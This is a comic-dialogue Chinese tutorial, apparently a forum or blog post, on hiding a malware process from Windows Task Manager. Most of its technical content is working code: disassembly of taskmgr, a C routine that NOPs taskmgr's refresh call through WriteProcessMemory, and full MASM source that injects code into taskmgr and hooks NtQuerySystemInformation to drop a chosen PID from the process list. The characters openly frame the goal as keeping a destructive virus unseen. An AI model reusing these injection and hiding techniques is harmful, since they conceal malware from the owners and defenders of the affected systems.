和Taskmgr过不去篇(无厘头版)
程序逆向初步之一
程序逆向初步之一
Hook入门级文章,主要想培养一下偶写文章的感觉,老鸟无视…
我想看看技术文章能不能无厘头的写,如果效果不错的话,准备更上一层-----
用我的原创漫画表达。:)
(警告1:文章中有部分“限制级”词语,请11岁以下弟弟妹妹误入)
(警告2: 修正警告1,不是“误入”,是“勿入”哦,我没有做暗示哦…)
http://album.hi.csdn.net/app_uploads/mydo/20090630/174418687.p.JPG?d=20090630174540031正义的hopy 加菲
http://album.hi.csdn.net/app_uploads/mydo/20090630/175033078.p.JPG?d=20090630175047515 邪恶的hopy 阿宝
时间: 终结者2018年
场景: 地下泡泡澡堂
故事: 纯属虚构
在一场残酷的西红柿大战后,最终邪恶阿宝使用卑鄙无耻的招数轻松战胜了单纯
的加菲,于是哥俩一起去地下废墟澡堂泡澡。在沉默了一阵之后加菲忽然问了阿宝
一个恐怖的问题……
加菲:……你说我们俩身上的毛哪个值钱…
阿宝:%##$%@#$%#@%#@,你想钱想疯啦……
加菲:最近手头比较紧,有没有活接?
阿宝:嘿嘿……搞定一个任务,钞票大大滴。
加菲(口水状):什么呀?
阿宝:老比最近打麻将输我200多,赖账不肯还……
加菲:不会吧…人家是首富哦…
阿宝:没办法呀,windows赔老喽,我准备把他的命根子毁了……
加菲:你这个流氓,我不跟你玩了…
阿宝:什么啊!我指的是他的windows,你想哪去了…
加菲(迅速岔开话题):今天晚上太阳好亮哦…
阿宝(画外音):#@$%#@%,我们俩到底谁邪恶…
加菲:怎么毁呀?
阿宝:我搞了一个宇宙超级大病毒程序,只要运行30分钟保准他的命根子玩蛋!
只要30分钟内不被windows taskmgr发现…
加菲:你傻啊?人家不会用其他进程查看工具嘛?
阿宝:说你不懂了吧,老比乱搞垄断,windows和taskmgr捆死了,其他
进程工具没法运行呀,嘿嘿…自掘死路…
加菲:这还不简单,做个rootkit在内核层把病毒进程隐藏起来不就行了。
阿宝:进不去RING0,只能在用户层搞……,有没有其他办法…
加菲:你超级病毒都能写出来,这个不会写?????
阿宝(-_-b):少废话,你要不要钞票了…
加菲:这个…
一炷香的功夫过去了…
阿宝:你到底想好了没啊?
加菲:taskmgr显示进程信息的控件是SysListView32,我想可以截获显示每一行
的消息,然后忽略显示病毒进程的那一条消息…
阿宝:好啊…做一个dll植入taskmgr,然后SysListView32子类化到dll中的一个
消息处理函数,过滤特定进程的消息…
加菲:没成功…可以截获和过滤消息,但显示老是会多出来一行…(可能是我
实现方法有问题,请看我以前在看雪发布的程序)
阿宝:那怎么办啊?
加菲:要不然这样,做一个进程文本修改器,类似游戏修改器中的自动修改变量,
只不过这个变量是一个进程名,只要找到病毒进程名字的文本,就将成其他混淆视
听的名字(svchost.exe)。
阿宝:8错,查找时要注意同时修改UNICODE的字符串哦…
加菲:成功了,因为两个进程同时要写一个内容,所以极少数时间里可能会造成
病毒进程名漏出马脚…
阿宝:嗯…病毒名有时会闪一下…进程数还是增加了…能不能干脆彻底删除这个
进程名而不是将其改成其他名字呢?
加菲:这个…
阿宝(舔和路雪冰淇淋):搞得怎么样了,有什么新花样呢?
加菲:如果你的超级病毒运行之后,就不准taskmgr 运行起来,如果已经运行起来
就将其关掉…
阿宝:这个不行,太招人显眼了…
加菲:把taskmgr僵掉…
阿宝:你以为你是林正英啊???怎么僵呢???
加菲:我刚才没事用IDA玩了一下taskmgr的body,发现一个好玩的
UpdateProcInfoArray过程哦,上代码(省略无关部分):
代码:
public: long __thiscall CProcPage::UpdateProcInfoArray(void) proc near mov eax, dword_1016580 .text:0100CAD5 shr eax, 0Ah .text:0100CAD8 mov ecx, eax .text:0100CADA imul ecx, [ebp+var_1FC] .text:0100CAE1 mov [ebp+var_88], ecx .text:0100CAE7 mov ecx, eax .text:0100CAE9 imul ecx, [ebp+var_1F8] .text:0100CAF0 mov edx, eax .text:0100CAF2 imul edx, [ebp+var_1F0] .text:0100CAF9 mov [ebp+var_74], ecx .text:0100CAFC mov ecx, eax .text:0100CAFE imul ecx, [ebp+var_1F4] .text:0100CB05 mov [ebp+var_6C], edx .text:0100CB08 mov edx, eax .text:0100CB0A imul eax, [ebp+var_1B4] .text:0100CB11 imul edx, [ebp+var_1B8] .text:0100CB18 mov [ebp+var_7C], eax .text:0100CB1B add eax, edx .text:0100CB1D push edi .text:0100CB1E mov [ebp+var_78], eax .text:0100CB21 push 24h .text:0100CB23 lea eax, [ebp+var_F0] .text:0100CB29 push eax .text:0100CB2A push 15h .text:0100CB2C mov [ebp+var_70], ecx .text:0100CB2F mov [ebp+var_80], edx .text:0100CB32 mov __int64 g_MEMMax, ecx .text:0100CB38 mov dword_1016564, edi .text:0100CB3E call esi ; NtQuerySystemInformation(x,x,x,x) .text:0100CB40 test eax, eax .text:0100CB42 jge short loc_100CB4E .text:0100CB42 .text:0100CB44 .text:0100CB44 loc_100CB44: ; CODE XREF: CProcPage::UpdateProcInfoArray(void)+4Bj .text:0100CB44 ; CProcPage::UpdateProcInfoArray(void)+7Aj .text:0100CB44 mov eax, 80004005h .text:0100CB49 jmp loc_100CE7E .text:0100CB49 .text:0100CB4E ; --------------------------------------------------------------------------- .text:0100CB4E .text:0100CB4E loc_100CB4E: ; CODE XREF: CProcPage::UpdateProcInfoArray(void)+EEj .text:0100CB4E mov eax, dword_1016580 .text:0100CB53 shr eax, 0Ah .text:0100CB56 imul eax, [ebp+var_DC] .text:0100CB5D mov ecx, ebx .text:0100CB5F mov [ebp+var_84], eax .text:0100CB65 call CProcPage::GetProcessInfo(void) .text:0100CB65 .text:0100CB6A cmp eax, edi .text:0100CB6C mov [ebp+var_58], eax .text:0100CB6F jl loc_100CE64 .text:0100CB6F .text:0100CB75 mov [ebp+var_48], edi .text:0100CB75 .text:0100CB78 .text:0100CB78 loc_100CB78: ; CODE XREF: CProcPage::UpdateProcInfoArray(void)+1EEj .text:0100CB78 mov esi, [ebx+10h] .text:0100CB7B add esi, [ebp+var_48] .text:0100CB7E mov eax, [esi+44h] .text:0100CB81 cmp eax, edi .text:0100CB83 jnz short loc_100CB8E .text:0100CB83 .text:0100CB85 cmp [esi+4], edi .text:0100CB88 jz loc_100CC1D
加菲:注意 call CProcPage::GetProcessInfo(void) 这一行,进去看看:
代码:
public: long __thiscall CProcPage::GetProcessInfo(void) proc near .text:0100A6AF ; CODE XREF: CProcPage::UpdateProcInfoArray(void)+111p .text:0100A6AF .text:0100A6AF var_4 = dword ptr -4 .text:0100A6AF .text:0100A6AF mov edi, edi .text:0100A6B1 push ebp .text:0100A6B2 mov ebp, esp .text:0100A6B4 push ecx .text:0100A6B5 push ebx .text:0100A6B6 push esi .text:0100A6B7 xor ebx, ebx .text:0100A6B9 push edi .text:0100A6BA mov edi, ds:GetProcessHeap() .text:0100A6C0 mov esi, ecx .text:0100A6C2 mov [ebp+var_4], ebx .text:0100A6C2 .text:0100A6C5 .text:0100A6C5 loc_100A6C5: ; CODE XREF: CProcPage::GetProcessInfo(void)+63j .text:0100A6C5 mov eax, [esi+10h] .text:0100A6C8 cmp eax, ebx .text:0100A6CA jz short loc_100A6F9 .text:0100A6CA .text:0100A6CC push ebx .text:0100A6CD push dword ptr [esi+14h] .text:0100A6D0 push eax .text:0100A6D1 push 5 .text:0100A6D3 call ds:NtQuerySystemInformation(x,x,x,x) .text:0100A6D9 cmp eax, ebx .text:0100A6DB jge short loc_100A71B .text:0100A6DB .text:0100A6DD cmp eax, 0C0000004h .text:0100A6E2 jnz short loc_100A723 .text:0100A6E2 .text:0100A6E4 mov eax, [esi+10h] .text:0100A6E7 cmp eax, ebx .text:0100A6E9 jz short loc_100A6F9 .text:0100A6E9 .text:0100A6EB push eax ; lpMem .text:0100A6EC push ebx ; dwFlags .text:0100A6ED call edi ; GetProcessHeap() .text:0100A6EF push eax ; hHeap .text:0100A6F0 call ds:HeapFree(x,x,x) .text:0100A6F6 mov [esi+10h], ebx .text:0100A6F6 .text:0100A6F9 .text:0100A6F9 loc_100A6F9: ; CODE XREF: CProcPage::GetProcessInfo(void)+1Bj .text:0100A6F9 ; CProcPage::GetProcessInfo(void)+3Aj .text:0100A6F9 add dword ptr [esi+14h], 1000h .text:0100A700 push dword ptr [esi+14h] ; dwBytes .text:0100A703 push ebx ; dwFlags .text:0100A704 call edi ; GetProcessHeap() .text:0100A706 push eax ; hHeap .text:0100A707 call ds:HeapAlloc(x,x,x) .text:0100A70D cmp eax, ebx .text:0100A70F mov [esi+10h], eax .text:0100A712 jnz short loc_100A6C5 .text:0100A712 .text:0100A714 mov [ebp+var_4], 8007000Eh .text:0100A714 .text:0100A71B .text:0100A71B loc_100A71B: ; CODE XREF: CProcPage::GetProcessInfo(void)+2Cj .text:0100A71B ; CProcPage::GetProcessInfo(void)+7Bj .text:0100A71B mov eax, [ebp+var_4] .text:0100A71E pop edi .text:0100A71F pop esi .text:0100A720 pop ebx .text:0100A721 leave .text:0100A722 retn
阿宝:喔欧...(移动广告:3G时代...就说喔欧),这个比较明显了,里面调用
了原生态API NtQuerySystemInformation(x,x,x,x)...
加菲:下面偶来写一个过程让taskmgr僵住:
代码:
#define MAGIC_ADDR 0x100cb65
static const byte VerFlag[] = {0xe8,0x45,0xdb,0xff,0xff};
bool stoptm(DWORD pid)
{
bool bSuccess = false;
HANDLE ph = 0;
if(!pid)
{
puts("taskmgr not run!");
goto QUIT;
}
ph = OpenProcess(PROCESS_ALL_ACCESS,false,pid);
if(!ph)
{
puts("can't open taskmgr!");
goto QUIT;
}
byte fixbin[sizeof(VerFlag)];
if(!ReadProcessMemory(ph,(LPCVOID)MAGIC_ADDR,fixbin,sizeof(fixbin),NULL))
{
puts("read mem failed!");
goto QUIT;
}
if(memcmp(VerFlag,fixbin,sizeof(fixbin)))
{
puts("taskmgr isn't right ver!");
goto QUIT;
}
memset(fixbin,0x90,sizeof(fixbin));
if(!WriteProcessMemory(ph,(LPVOID)MAGIC_ADDR,fixbin,sizeof(fixbin),NULL))
{
puts("write mem failed!");
goto QUIT;
}
bSuccess = true;
QUIT:
if(ph)
CloseHandle(ph);
return bSuccess;
}
阿宝:我好像能看懂了,将对应的调用语句NOP掉,从而taskmgr无法再刷新
进程列表了...但这个不能对应不同版本的taskmgr吧?
加菲:这个...那是当然...
阿宝:你能不能给我个最终解决办法啊...
加菲:没办法了...只有用各个版本通杀技了,HOOk NtQuerySystemInformation ,
然后改变其返回内容。要注意的是我们只需要HOOK 第一个参数为5的调用,
即Query系统进程信息,其他都不用理会。NtQuerySystemInformation
获取进程信息如果成功,将会返回一个数组,或者称其为一个链表更准确。结构如下:
代码:
typedef struct _SYSTEM_PROCESSES
{
ULONG NextEntryDelta; //构成结构序列的偏移量;
ULONG ThreadCount; //线程数目;
ULONG Reserved1[6];
LARGE_INTEGER CreateTime; //创建时间;
LARGE_INTEGER UserTime; //用户模式(Ring 3)的CPU时间;
LARGE_INTEGER KernelTime; //内核模式(Ring 0)的CPU时间;
UNICODE_STRING ProcessName; //进程名称;
KPRIORITY BasePriority; //进程优先权;
ULONG ProcessId; //进程标识符;
ULONG InheritedFromProcessId; //父进程的标识符;
ULONG HandleCount; //句柄数目;
ULONG Reserved2[2];
VM_COUNTERS VmCounters; //虚拟存储器的结构,见下;
IO_COUNTERS IoCounters; //IO计数结构,见下;
SYSTEM_THREADS Threads[1]; //进程相关线程的结构数组,见下;
}SYSTEM_PROCESSES,*PSYSTEM_PROCESSES;
我要做的只是在链表中查找需要隐藏进程的ID,然后将其剔除即可。
阿宝:怎么剔除呢?
加菲:分2种情况,若PID出现在链表的的尾部则直接将上一个链表指向NULL,
否则需要将上一个结构的指针指向PID结构后面一个结构,从而将其剔除,完整代码如下:
代码:
.386 .model flat, stdcall option casemap:none .nocref .nolist include D:\work\masm32\include\windows.inc include D:\work\masm32\include\user32.inc include D:\work\masm32\include\kernel32.inc .list .listmacro .listmacroall IFNDEF UNICODE_STRING UNICODE_STRING struct _Length WORD ? MaximumLength WORD ? Buffer PWSTR ? UNICODE_STRING ends PUNICODE_STRING typedef ptr UNICODE_STRING ENDIF SPI struct NextOffset DWORD ? DWORD ? Times QWORD 6 dup(?) ImageName UNICODE_STRING <?> DWORD ? ProcessId DWORD ? Reserved DWORD 7 dup(?) SPI ends PSPI typedef ptr SPI .const szDll db "ntdll.dll",0 szQSI_func db "NtQuerySystemInformation",0 .code ;********************************************************** RT_BIN_START equ $ PID DWORD ? ;要隐藏进程的pid pQSI_func DWORD ? pQSI_Next DWORD ? pBuf DWORD ? pRetAddr DWORD ? pPreviousSPI PSPI 0 dwEBX DWORD ? ;ORGBIN byte 5 dup(?) FIXBIN byte 5 dup(?) RT_CODE_OFFSET equ $ - RT_BIN_START len0 textequ %RT_CODE_OFFSET % echo RT_CODE_OFFSET is len0 ;++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ myQSI_func proc mov ecx,ebx call @F @@: pop ebx sub ebx,offset @B jmp DOIT GoMaMa: mov eax,dword ptr [esp] mov dword ptr [esp + 4],eax pop eax ORGBIN byte 5 dup(?) jmp [ebx + pQSI_Next] DOIT: mov dword ptr [ebx + dwEBX],ecx mov dword ptr [ebx + pBuf],0 push dword ptr [esp] pop dword ptr [ebx + pRetAddr] .if dword ptr [esp + 4] == 5 push dword ptr [esp+8] pop dword ptr [ebx + pBuf] .endif call GoMaMa ;调用原始QSI成功且是获取SPIs的调用 .if eax == 0 && dword ptr [ebx + pBuf] != 0 assume eax:PSPI mov ecx,dword ptr [ebx + PID] mov eax,dword ptr [ebx + pBuf] .while TRUE .if [eax].ProcessId == ecx .if [eax].NextOffset == 0 mov eax,[ebx + pPreviousSPI] mov [eax].NextOffset,0 .else mov ecx,[eax].NextOffset mov eax,[ebx + pPreviousSPI] add ecx,[eax].NextOffset mov [eax].NextOffset,ecx .endif .break .endif .break .if [eax].NextOffset == 0 push eax pop dword ptr [ebx + pPreviousSPI] add eax,[eax].NextOffset .endw assume eax:nothing .endif mov ecx,ebx mov ebx,[ebx + dwEBX] jmp [ecx + pRetAddr] ;ret myQSI_func endp ;++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ RT_BIN_END equ $ RT_BIN_LEN equ RT_BIN_END - RT_BIN_START T_BIN_LEN textequ %RT_BIN_LEN % echo RT_BIN_LEN is T_BIN_LEN ;++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ hookQSIfunc proc C uses ebx edi esi ph:HANDLE,pid:DWORD local bSuccess,pRTBin,oldProtect mov bSuccess,FALSE .if pid == 0 jmp QUIT .endif invoke VirtualProtect,offset RT_BIN_START,\ T_BIN_LEN,PAGE_EXECUTE_READWRITE,\ addr oldProtect .if !eax jmp QUIT .endif invoke LoadLibrary,addr szDll invoke GetProcAddress,eax,addr szQSI_func .if !eax jmp QUIT .endif mov pQSI_func,eax invoke VirtualAllocEx,ph,NULL,T_BIN_LEN,\ MEM_COMMIT,PAGE_EXECUTE_READWRITE .if !eax jmp QUIT .endif mov pRTBin,eax invoke ReadProcessMemory,ph,pQSI_func,\ addr ORGBIN,5,NULL .if !eax jmp QUIT .endif mov eax,pRTBin add eax,RT_CODE_OFFSET sub eax,pQSI_func sub eax,5 mov byte ptr [FIXBIN],0E9h mov dword ptr [FIXBIN+1],eax mov eax,pQSI_func add eax,5 mov pQSI_Next,eax push pid pop PID invoke WriteProcessMemory,ph,pRTBin,\ offset RT_BIN_START,T_BIN_LEN,NULL .if !eax jmp QUIT .endif invoke WriteProcessMemory,ph,pQSI_func,\ addr FIXBIN,5,NULL .if !eax jmp QUIT .endif mov bSuccess,TRUE QUIT: .if pRTBin ;invoke VirtualFreeEx,ph,pRTBin,\ ;T_BIN_LEN,MEM_RELEASE .endif mov eax,bSuccess ret hookQSIfunc endp ;********************************************************** end
阿宝:你好像是HOOK之后,直接将以上代码拷贝到taskmgr.exe进程空间中,
等待其自动调用,是吗?
加菲:没错,拷贝功能的函数即是hookQSIfunc,当然这要首先保证taskmgr在运行:
代码:
//检查taskmgr.exe当前是否在运行
DWORD findtm(void)
{
DWORD pid = 0;
PROCESSENTRY32 process = {.dwSize=sizeof(PROCESSENTRY32)};
HANDLE hss = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
Process32First(hss,&process);
while(Process32Next(hss,&process))
{
if(!strcmp(process.szExeFile,"taskmgr.exe"))
{
pid = process.th32ProcessID;
break;
}
}
CloseHandle(hss);
return pid;
}
阿宝(暗笑):是这样啊...嘿嘿
加菲(聚精会神地):这样一来无论哪个版本的taskmgr,只要获取机制没有变,
都可以搞定了,呵呵...终于搞定了...那个报酬怎么算...(回头),人呢???
阿宝(全裸速逃中...)
加菲:阿宝,你竟然敢欺骗偶的感情....
愤怒的加菲制造了N个加菲猫终结者T1300型追杀阿宝,至于阿宝能否逃脱,
这是另一个故事了哦。
(PS1:使用了电影分镜头剧本结构,适合改编为cartoon或flash之类的咚咚,结尾不是很好,修改中)
(PS2: 场景的选择是从刚看完的终结者2018获得的。)
源代码下载: